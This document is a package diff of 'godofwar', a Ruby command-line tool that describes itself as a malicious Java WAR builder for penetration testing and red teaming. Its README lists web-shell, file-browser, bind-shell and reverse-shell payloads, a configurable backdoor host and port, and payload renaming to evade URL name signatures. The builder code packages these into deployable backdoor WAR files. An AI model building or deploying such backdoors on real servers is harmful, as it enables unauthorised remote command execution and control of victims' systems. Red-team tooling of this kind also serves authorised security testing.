godofwar 0.1.1

checksums.yaml

@@ -0,0 +1,7 @@
+---
+SHA256:
+  metadata.gz: cad770ac51b330105ebdebed6020e46fe9389e1a5b7585921b7541c34178b0b0
+  data.tar.gz: 99bd5b547ce8c0f1cd9c3363aa503d3243f32e6d94ae15933163f35b07b71bee
+SHA512:
+  metadata.gz: 9fac4faf7bf2cbd79f2498c858a288e8548aac1d01e14d5fee6b799c5930216baabe4e2d96ca6aaa1d58cc6a230d29635ae8964b399f4c3c8247f552f07df53c
+  data.tar.gz: 13dc0ed6aadb81cafe8c211e288f312339bc164a5ffafbf716a6d1a9da83ec57550f3c256153b1390a2a739684927a304c2c23ff6ad06590f40d5964c5244b6b

data/CODE_OF_CONDUCT.md

@@ -0,0 +1,74 @@
+# Contributor Covenant Code of Conduct
+
+## Our Pledge
+
+In the interest of fostering an open and welcoming environment, we as
+contributors and maintainers pledge to making participation in our project and
+our community a harassment-free experience for everyone, regardless of age, body
+size, disability, ethnicity, gender identity and expression, level of experience,
+nationality, personal appearance, race, religion, or sexual identity and
+orientation.
+
+## Our Standards
+
+Examples of behavior that contributes to creating a positive environment
+include:
+
+* Using welcoming and inclusive language
+* Being respectful of differing viewpoints and experiences
+* Gracefully accepting constructive criticism
+* Focusing on what is best for the community
+* Showing empathy towards other community members
+
+Examples of unacceptable behavior by participants include:
+
+* The use of sexualized language or imagery and unwelcome sexual attention or
+advances
+* Trolling, insulting/derogatory comments, and personal or political attacks
+* Public or private harassment
+* Publishing others' private information, such as a physical or electronic
+  address, without explicit permission
+* Other conduct which could reasonably be considered inappropriate in a
+  professional setting
+
+## Our Responsibilities
+
+Project maintainers are responsible for clarifying the standards of acceptable
+behavior and are expected to take appropriate and fair corrective action in
+response to any instances of unacceptable behavior.
+
+Project maintainers have the right and responsibility to remove, edit, or
+reject comments, commits, code, wiki edits, issues, and other contributions
+that are not aligned to this Code of Conduct, or to ban temporarily or
+permanently any contributor for other behaviors that they deem inappropriate,
+threatening, offensive, or harmful.
+
+## Scope
+
+This Code of Conduct applies both within project spaces and in public spaces
+when an individual is representing the project or its community. Examples of
+representing a project or community include using an official project e-mail
+address, posting via an official social media account, or acting as an appointed
+representative at an online or offline event. Representation of a project may be
+further defined and clarified by project maintainers.
+
+## Enforcement
+
+Instances of abusive, harassing, or otherwise unacceptable behavior may be
+reported by contacting the project team at king.sabri@gmail.com. All
+complaints will be reviewed and investigated and will result in a response that
+is deemed necessary and appropriate to the circumstances. The project team is
+obligated to maintain confidentiality with regard to the reporter of an incident.
+Further details of specific enforcement policies may be posted separately.
+
+Project maintainers who do not follow or enforce the Code of Conduct in good
+faith may face temporary or permanent repercussions as determined by other
+members of the project's leadership.
+
+## Attribution
+
+This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4,
+available at [http://contributor-covenant.org/version/1/4][version]
+
+[homepage]: http://contributor-covenant.org
+[version]: http://contributor-covenant.org/version/1/4/

data/Gemfile

@@ -0,0 +1,4 @@
+source "https://rubygems.org"
+
+# Specify your gem's dependencies in godofwar.gemspec
+gemspec

data/Gemfile.lock

@@ -0,0 +1,19 @@
+PATH
+  remote: .
+  specs:
+    godofwar (0.1.1)
+      rubyzip
+
+GEM
+  remote: https://rubygems.org/
+  specs:
+    rubyzip (1.2.2)
+
+PLATFORMS
+  ruby
+
+DEPENDENCIES
+  godofwar!
+
+BUNDLED WITH
+   2.0.1

data/README.md

@@ -0,0 +1,132 @@
+# GodOfWar - Malicious Java WAR builder
+A command-line tool to generate war payloads for penetration testing / red teaming purposes, written in ruby.
+
+```
+                              .
+                             hhh              
+                            hhhhhhh           
+                           hhhhhhhh        
+                          hhhhhhhh+        
+                         hhhhhhhh'           
+                        hhhhhhhh.            
+                       hhhhhhhhh             
+        ..--          hhhhhhhhh             
+      -sh/..  +.     hhhhhhhhh:              
+      /+/:-/+ss-`   hhhhhhhhhh:               
+      /MMM`ss:``.`  hhhhhhhhhh:              
+     .MMMMM:        hhhhhhhhhhhhhhhhh:       
+     MMMMMMM:        hhhhhhhhhhhhhhhh:      
+     MMMMMMMMMMMMM:  hhhhhhhhhhhhhhhh`       
+    :NNm:odh/oMMMNs. hhhhhhhhhhhhhhhh`       
+   ./:`smdo+oos++-    `++sNMMMMMNmh+         
+      .-y-`     ` :.  /   -dmddhhhhh-        
+       o/-     `//o/ /M/   `+hhhhhhhh`       
+      /o     :yosmy   +y  .`.hhhhhhhho       
+      +`     /../.:      `.y::hhhhhs:`       
+       `      `+yys`   .sy` /oohhy:          
+                `/:s/-``     `.hh`           
+               ..`     `       y+            
+            .hNNmmNdymmmmds`   :-            
+            hs.   ``..    :y-  `             
+               -hhmNmddm+   .                
+               `NMMMMMMm                     
+                ` `oMMy                      
+            `.     /Md-      :o  
+           MMMMMMMMMMMMMMMMMMM:             
+            MMMMMMMMMMMMMMMMMM:              
+             MMMMMMMMMMMMMMMMM               
+              MMMMMMMMMMMMMMM.               
+              `MMMMMMMMMMMMM.                 
+                :sNMMMNMdo:                  
+                  ``+m:/-                    
+                     `                                  
+GodOfWar - Malicious Java WAR builder.
+```
+
+## Features
+
+- Preexisting payloads. (try `-l/--list`)
+    - cmd_get
+    - filebrowser
+    - bind_shell
+    - reverse_shell_ui 
+- Configurable backdoor. (try `--host/-port`)
+- Control over payload name. 
+  - To avoid malicious name after deployment to bypass URL name signatures.
+
+## Installation
+
+```
+$ gem install godofwar
+```
+
+## Usage
+```
+$ godofwar -h 
+
+Help menu:
+   -p, --payload PAYLOAD            Generates war from one of the available payloads.
+                                        (check -l/--list)
+   -H, --host IP_ADDR               Local or Remote IP address for the chosen payload
+                                        (used with -p/--payload)
+   -P, --port PORT                  Local or Remote Port for the chosen payload
+                                        (used with -p/--payload)
+   -o, --output [FILE]              Output file and the deployment name.
+                                        (default is the payload original name. check '-l/--list')
+   -l, --list                       list all available payloads.
+   -h, --help                       Show this help message.
+```
+
+### Example 
+
+**List all payloads**
+```
+$ godofwar -l
+├── cmd_get
+│   └── Information:
+│       ├── Description: Command execution via web interface
+│       ├── OS:          any
+│       ├── Settings:    {"false"=>"No Settings required!"}
+│       ├── Usage:       http://host/cmd.jsp?cmd=whoami
+│       ├── References:  ["https://github.com/danielmiessler/SecLists/tree/master/Payloads/laudanum-0.8/jsp"]
+│       └── Local Path:  /FULL/PATH/HERE/godofwar/payloads/cmd_get
+├── filebrowser
+│   └── Information:
+│       ├── Description: Remote file browser, upload, download, unzip files and native command execution
+│       ├── OS:          any
+│       ├── Settings:    {"false"=>"No Settings required!"}
+│       ├── Usage:       http://host/filebrowser.jsp
+│       ├── References:  ["http://www.vonloesch.de/filebrowser.html"]
+│       └── Local Path:  /FULL/PATH/HERE/godofwar/payloads/filebrowser
+├── bind_shell
+│   └── Information:
+│       ├── Description: TCP bind shell
+│       ├── OS:          any
+│       ├── Settings:    {"port"=>4444, "false"=>"No Settings required!"}
+│       ├── Usage:       http://host/reverse-shell.jsp
+│       ├── References:  ["Metasploit - msfvenom -p java/jsp_shell_bind_tcp"]
+│       └── Local Path:  /FULL/PATH/HERE/godofwar/payloads/bind_shell
+├── reverse_shell_ui
+│   └── Information:
+│       ├── Description: TCP reverse shell with a UI to set LHOST and LPORT from browser.
+│       ├── OS:          windows
+│       ├── Settings:    {"host"=>"attacker", "port"=>4444, "false"=>"No Settings required!"}
+│       ├── Usage:       http://host/reverse_shell_ui.jsp
+│       ├── References:  []
+│       └── Local Path:  /FULL/PATH/HERE/godofwar/payloads/reverse_shell_ui
+```
+
+**Generate payload with LHOST and LPORT**
+```
+godofwar -p reverse_shell_ui -H 192.168.100.10  -P 9911 -o puppy
+```
+
+## Contributing
+
+Bug reports and pull requests are welcome on GitHub at https://github.com/[USERNAME]/godofwar.
+
+
+## License
+
+The gem is available as open source under the terms of the [MIT License](http://opensource.org/licenses/MIT).
+

data/Rakefile

@@ -0,0 +1,2 @@
+require "bundler/gem_tasks"
+task :default => :spec

data/bin/godofwar

@@ -0,0 +1,77 @@
+#!/usr/bin/env ruby
+#
+# GodOfWare - A command-line tool to generate war payloads for penetration testing / red teaming purposes.
+# @Author: KING SABRI - @KINGSABRI
+#
+lib = File.expand_path("../../lib", __FILE__)
+$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
+require 'godofwar'
+
+options = OpenStruct.new(payload: nil, host: nil, port: nil,
+                         list: false, output: nil, version: false)
+
+option_parser = OptionParser.new
+option_parser.banner = "#{"GodOfWar".bold} - Malicious Java WAR builder."
+option_parser.set_summary_indent '   '
+option_parser.separator "\nHelp menu:".underline
+option_parser.on('-p', '--payload PAYLOAD',
+                 'Generates war from one of the available payloads.',
+                 "\t(check -l/--list)"
+) {|v| options.payload = v}
+
+option_parser.on('-H', '--host IP_ADDR',
+                 'Local or Remote IP address for the chosen payload',
+                 "\t(used with -p/--payload)"
+) {|v| options.host = v}
+option_parser.on('-P', '--port PORT', Integer,
+                 'Local or Remote Port for the chosen payload',
+                 "\t(used with -p/--payload)"
+) {|v| options.port = v}
+option_parser.on('-o', "--output [FILE]",
+                 'Output file and the deployment name.',
+                 "\t(default is the payload original name. check '-l/--list')") do |v|
+  options.output = v
+end
+option_parser.on('-l', '--list', 'list all available payloads.') { |v| options.list = v }
+option_parser.on('-h', '--help', 'Show this help message') {puts GodOfWar::Utils.banner , option_parser; exit!}
+
+begin
+  option_parser.parse!(ARGV)
+  payloads = GodOfWar::Payloads.new
+
+  case
+  when options.list
+    puts payloads.list_tree
+  when options.payload
+    payload = payloads.find_payload(options.payload)
+
+    if payload.nil?
+      puts "Unknown Payload: check available payloads using '-l/--list' option.".warn
+      exit!
+    end
+
+    GodOfWar::Builder.new(payload) do |build|
+      build.output = options.output
+      build.directory_structure
+      build.web_xml
+      build.manifest_mf
+      build.set_payload(options.host, options.port)
+      build.war
+    end
+
+  else
+    puts GodOfWar::Utils.banner
+    puts option_parser
+  end
+rescue OptionParser::MissingArgument => e
+  e.args.each { |arg| puts "#{e.reason.capitalize} for '#{arg}' option.".error }
+  puts option_parser
+rescue OptionParser::InvalidOption => e
+  puts "#{e}".error
+  puts option_parser
+rescue Exception => e
+  puts "Unknown Exception".error
+  puts 'Please report the issue at: https://github.com/KINGSABRI/godofwar/issues'.warn
+  puts e.full_message
+  puts "#{e}".error
+end

data/godofwar.gemspec

@@ -0,0 +1,26 @@
+
+lib = File.expand_path("../lib", __FILE__)
+$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
+require "godofwar/version"
+
+Gem::Specification.new do |spec|
+  spec.name          = "godofwar"
+  spec.version       = GodOfWar::VERSION
+  spec.authors       = ["KINGSABRI"]
+  spec.email         = ["king.sabri@gmail.com"]
+
+  spec.summary       = %q{Evil war builder for hackers with built-in war payloads.}
+  spec.description   = %q{Evil war builder for hackers with built-in war payloads.}
+  spec.homepage      = "https://github.com/KINGSABRI/godofwar"
+  spec.license       = "MIT"
+
+  spec.files         = Dir.glob("**/*")
+  spec.bindir        = "bin"
+  spec.executables   = ["godofwar"]
+  spec.require_paths = ["lib"]
+
+  spec.add_dependency 'rubyzip'
+
+  spec.metadata["homepage_uri"]    = spec.homepage
+  spec.metadata["source_code_uri"] = "https://github.com/KINGSABRI/godofwar"
+end

data/lib/godofwar.rb

@@ -0,0 +1,20 @@
+# Standard libraries
+require 'optparse'
+require 'ostruct'
+require 'json'
+require 'fileutils'
+
+# GodOfWar
+require 'godofwar/version'
+require 'godofwar/builder'
+require 'godofwar/payloads'
+require 'godofwar/extensions'
+require 'godofwar/utils'
+
+# Gems
+require 'zip'
+
+module GodOfWar
+  class Error < StandardError; end
+  String.class_eval { include Extensions::Core::String }
+end

data/lib/godofwar/builder.rb

@@ -0,0 +1,137 @@
+#
+# KING SABRI | @KINGSABRI
+#
+module GodOfWar
+  #
+  # Builder module responsible for building base files around GodOfWar
+  # ├── cmd_get.jsp
+  # ├── META-INF
+  # │   └── MANIFEST.MF
+  # │         Manifest-Version: 1.0
+  # │         Created-By: 1.6.0_10 (Sun Microsystems Inc.)
+  # └── WEB-INF
+  #     └── web.xml
+  #
+  class Builder
+    attr_accessor :output
+
+    def initialize(payload)
+      @output  = nil
+      @payload = payload
+      yield self
+    end
+
+    def directory_structure
+      if @output
+        @war_dir = @output
+      else
+        @war_dir = @payload.name
+        @output  = @payload.name
+      end
+
+      @output = @output? @output : @payload.name
+      rename_if_exists("#{@war_dir}.war")
+      puts "Creating Directory Structure:".tell
+      FileUtils.mkdir_p(File.join(@war_dir, 'WEB-INF'))
+      FileUtils.mkdir_p(File.join(@war_dir, 'META-INF'))
+      puts "#{@war_dir}".step_success
+      puts File.join(@war_dir, 'WEB-INF').step_success
+      puts File.join(@war_dir, 'META-INF').step_success
+    end
+
+    # WEB-INF
+    #
+    # web_xml builds 'web.xml' file for a given jsp file
+    #
+    # @return [String]
+    #
+    def web_xml
+      web_xml_path = File.join(@war_dir, 'WEB-INF', 'web.xml')
+      web_xml = <<~WEBXML
+                  <?xml version="1.0" ?>
+                  <web-app xmlns="http://java.sun.com/xml/ns/j2ee"
+                     xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+                     xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee
+                     http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"
+                    version="2.4">
+                  <servlet>
+                    <servlet-name>#{@output.capitalize}</servlet-name>
+                    <jsp-file>/#{@output}.jsp</jsp-file>
+                  </servlet>
+                  </web-app>
+                WEBXML
+
+      File.write(web_xml_path, web_xml)
+      puts "#{web_xml_path}".step_success
+    end
+
+    # web_xml builds 'MANIFEST.MF' file for a given jsp file
+    #
+    # @return [String]
+    #
+    def manifest_mf
+      manifest_mf_path = File.join(@war_dir, 'META-INF', 'MANIFEST.MF')
+      manifest_mf =
+          <<~MANIFEST
+            Manifest-Version: 1.0
+            Created-By: 1.6.0_10 (Sun Microsystems Inc.)
+          MANIFEST
+
+      File.write(manifest_mf_path, manifest_mf)
+      puts "#{File.join(@war_dir, 'META-INF', 'MANIFEST.MF')}".step_success
+    end
+
+    def set_payload(host, port)
+      payload_file = File.join(@payload.path, "#{@payload.name}.jsp")
+
+      if @payload.conf.empty?
+        payload_raw = File.read(payload_file)
+      else
+        host = host.nil? ? @payload.conf["host"] : host
+        port = port.nil? ? @payload.conf["host"] : port
+        payload_raw = File.read(payload_file)
+                          .sub('HOSTHOST', "#{host}").sub('PORTPORT', "#{port}")
+      end
+      File.write(File.join(@output, "#{@output}.jsp"), payload_raw)
+      puts "Setting up payload:".tell
+      puts "#{File.join(@war_dir, @payload.name)}.jsp".step_success
+    end
+
+    # build_war build the WAR file by recursively the source directory content then zip it
+    def war
+      final_war = "#{@output}.war"
+      Zip::File.open(final_war, Zip::File::CREATE) do |zip|
+        Dir.glob("#{@war_dir}/**/*" ).each do |file|
+          zip.add(file.sub(@output, '').sub(/[\/|\\]/, ''), file)
+        end
+      end
+      puts "Cleaning up".tell
+      FileUtils.rm_rf(@war_dir)
+      puts "Backdoor ".done + "#{@output}.war".bold + " has been created."
+    end
+
+    private
+
+    # check if the war file exists, rename it if true.
+    def rename_if_exists(file)
+      if File.exist? file
+        rename = "#{file}_#{Time.now.to_i}"
+        puts "File '#{file}' exists".warn
+        puts "Renamed '#{file}' to '#{rename}'".tell
+        FileUtils.mv(file, rename, force: true)
+      end
+    end
+
+  end
+end
+
+if __FILE__ == $0
+  payload = 'reverse_shell_ui'
+  GodOfWar::Builder.new(payload) do |build|
+    # p build.structure
+    # p build.web_xml
+    puts build.payload('1.1.1.1', 4444)
+    p build.default
+    # p build.war
+  end
+end